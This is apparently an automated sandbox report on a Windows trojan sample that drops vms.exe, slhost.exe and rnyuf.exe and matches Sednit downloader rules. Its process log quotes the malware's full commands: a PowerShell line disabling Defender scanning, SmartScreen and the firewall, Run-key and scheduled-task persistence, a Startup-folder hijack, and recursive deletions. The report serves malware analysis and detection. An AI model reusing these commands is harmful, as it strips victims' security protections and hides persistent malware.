      Source: C:\Windows\Temp\qmpezjm, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: C:\Windows\Temp\dhfqtab, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: C:\Users\user\AppData\Local\Temp\jonmpkl, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: C:\Windows\Temp\zldwyyp, type: DROPPEDMatched rule: MAL_Sednit_DelphiDownloader_Apr18_2 date = 2018-04-24, hash5 = 72aa4905598c9fb5a1e3222ba8daa3efb52bbff09d89603ab0911e43e15201f3, hash4 = 0458317893575568681c86b83e7f9c916540f0f58073b386d4419517c57dcb8f, hash3 = 5427ecf4fa37e05a4fbab8a31436f2e94283a832b4e60a3475182001b9739182, hash2 = 657c83297cfcc5809e89098adf69c206df95aee77bfc1292898bbbe1c44c9dc4, hash1 = 53aef1e8b281a00dea41387a24664655986b58d61d39cfbde7e58d8c2ca3efda, author = Florian Roth, description = Detects malware from Sednit Delphi Downloader report, reference = https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/
      Source: C:\ProgramData\UpSys.exeFile deleted: C:\Windows\Temp\aut5BC3.tmp
      Source: C:\ProgramData\UpSys.exeFile created: C:\Windows\TEMP\aut5BC3.tmp
      Source: We7WnoqeXe.exeBinary or memory string: OriginalFilename vs We7WnoqeXe.exe
      Source: We7WnoqeXe.exe, 00000001.00000002.384831892.00000000011BD000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameflo.exeN vs We7WnoqeXe.exe
      Source: We7WnoqeXe.exe, 00000001.00000003.263529808.00000000039E6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameVHMediaCOM.dll: vs We7WnoqeXe.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Security
      Source: We7WnoqeXe.exeStatic PE information: invalid certificate
      Source: We7WnoqeXe.exeStatic PE information: Section: ZLIB complexity 0.997399056312
      Source: We7WnoqeXe.exeStatic PE information: Section: ZLIB complexity 0.999849759615
      Source: We7WnoqeXe.exeStatic PE information: Section: `~\1 ZLIB complexity 1.00537109375
      Source: vms.exe.1.drStatic PE information: Section: ZLIB complexity 1.00041698052
      Source: vms.exe.1.drStatic PE information: Section: ZLIB complexity 1.00077810002
      Source: vms.exe.1.drStatic PE information: Section: ZLIB complexity 1.02178217822
      Source: vms.exe.1.drStatic PE information: Section: ZLIB complexity 1.04119850187
      Source: slhost.exe.1.drStatic PE information: Section: ZLIB complexity 1.00037414648
      Source: slhost.exe.1.drStatic PE information: Section: ZLIB complexity 0.997438741884
      Source: slhost.exe.1.drStatic PE information: Section: ZLIB complexity 1.01014760148
      Source: slhost.exe.1.drStatic PE information: Section: ZLIB complexity 1.08333333333
      Source: slhost.exe.1.drStatic PE information: Section: ZLIB complexity 1.04119850187
      Source: rnyuf.exe.14.drStatic PE information: Section: ZLIB complexity 1.00041698052
      Source: rnyuf.exe.14.drStatic PE information: Section: ZLIB complexity 1.00077810002
      Source: rnyuf.exe.14.drStatic PE information: Section: ZLIB complexity 1.02178217822
      Source: rnyuf.exe.14.drStatic PE information: Section: ZLIB complexity 1.04119850187
      Source: System.exe.15.drStatic PE information: Section: ZLIB complexity 1.00037414648
      Source: System.exe.15.drStatic PE information: Section: ZLIB complexity 0.997438741884
      Source: System.exe.15.drStatic PE information: Section: ZLIB complexity 1.01014760148
      Source: System.exe.15.drStatic PE information: Section: ZLIB complexity 1.08333333333
      Source: System.exe.15.drStatic PE information: Section: ZLIB complexity 1.04119850187
      Source: vms[1].exe0.19.drStatic PE information: Section: ZLIB complexity 1.00041698052
      Source: vms[1].exe0.19.drStatic PE information: Section: ZLIB complexity 1.00077810002
      Source: vms[1].exe0.19.drStatic PE information: Section: ZLIB complexity 1.02178217822
      Source: vms[1].exe0.19.drStatic PE information: Section: ZLIB complexity 1.04119850187
      Source: slhost[1].exe0.19.drStatic PE information: Section: ZLIB complexity 1.00037414648
      Source: slhost[1].exe0.19.drStatic PE information: Section: ZLIB complexity 0.997438741884
      Source: slhost[1].exe0.19.drStatic PE information: Section: ZLIB complexity 1.01014760148
      Source: slhost[1].exe0.19.drStatic PE information: Section: ZLIB complexity 1.08333333333
      Source: slhost[1].exe0.19.drStatic PE information: Section: ZLIB complexity 1.04119850187
      Source: slhost.exe.19.drStatic PE information: Section: ZLIB complexity 1.00037414648
      Source: slhost.exe.19.drStatic PE information: Section: ZLIB complexity 0.997438741884
      Source: slhost.exe.19.drStatic PE information: Section: ZLIB complexity 1.01014760148
      Source: slhost.exe.19.drStatic PE information: Section: ZLIB complexity 1.08333333333
      Source: slhost.exe.19.drStatic PE information: Section: ZLIB complexity 1.04119850187
      Source: vms.exe.19.drStatic PE information: Section: ZLIB complexity 1.00041698052
      Source: vms.exe.19.drStatic PE information: Section: ZLIB complexity 1.00077810002
      Source: vms.exe.19.drStatic PE information: Section: ZLIB complexity 1.02178217822
      Source: vms.exe.19.drStatic PE information: Section: ZLIB complexity 1.04119850187
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@265/40@12/8
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: We7WnoqeXe.exeReversingLabs: Detection: 57%
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\We7WnoqeXe.exe "C:\Users\user\Desktop\We7WnoqeXe.exe"
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess created: C:\Users\user\AppData\Local\Temp\vms.exe "C:\Users\user\AppData\Local\Temp\vms.exe"
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess created: C:\Users\user\AppData\Local\Temp\slhost.exe "C:\Users\user\AppData\Local\Temp\slhost.exe"
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\vms.exeProcess created: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe"
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\
      Source: unknownProcess created: C:\ProgramData\MicrosoftNetwork\System.exe "C:\ProgramData\MicrosoftNetwork\System.exe"
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\5c436eadc6\
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\ProgramData\UpSys.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\ProgramData\UpSys.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exeProcess created: C:\Users\user\AppData\Local\Temp\vms\vms.exe "C:\Users\user\AppData\Local\Temp\vms\vms.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
      Source: C:\ProgramData\UpSys.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\ProgramData\UpSys.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\ProgramData\UpSys.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
      Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Windows\System32\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM
      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\vms\vms.exe "C:\Users\user\AppData\Local\Temp\vms\vms.exe"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess created: C:\Users\user\AppData\Local\Temp\vms.exe "C:\Users\user\AppData\Local\Temp\vms.exe" Jump to behavior
      Source: C:\Users\user\Desktop\We7WnoqeXe.exeProcess created: C:\Users\user\AppData\Local\Temp\slhost.exe "C:\Users\user\AppData\Local\Temp\slhost.exe" Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\vms.exeProcess created: C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe "C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe" Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
      Source: C:\Users\user\AppData\Local\Temp\slhost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
